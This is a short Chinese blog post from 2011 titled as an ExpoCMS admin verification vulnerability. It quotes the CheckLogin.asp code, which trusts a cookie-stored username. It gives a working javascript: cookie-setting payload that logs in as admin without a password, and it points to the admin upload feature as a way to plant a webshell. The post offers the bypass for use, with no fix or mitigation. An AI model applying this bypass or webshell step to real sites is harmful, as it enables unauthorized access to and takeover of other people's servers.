ExpoCMS后台验证漏洞

2011, January 6, 10:24 AM. 漏洞分析
Submitted by admin

/admin/CheckLogin.asp

 

  1. <%
  2. Response.Buffer = True
  3. Response.Expires = -1
  4. Response.ExpiresAbsolute = Now() - 1
  5. Response.Expires = 0
  6. Response.CacheControl = "no-cache"
  7. Session.CodePage = 65001
  8. Response.Charset = "UTF-8"
  9. UserName=Request.Cookies("CNVP_CMS2")("UserName")  '在cookie中取username值
  10. If UserName="" Then     
  11.         Response.Redirect("Admin_Login.asp")        '如果为空,就跳转
  12.         Response.End()
  13. End If
  14. %>

 

exp: javascript:alert(document.cookie="CNVP%5FCMS2=UserName=admin")   这样就能进后台了  /admin/Admin_Index.asp
后台有个上传的地方可以拿webshell

Tags: expocms

« 上一篇 | 下一篇 »

Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):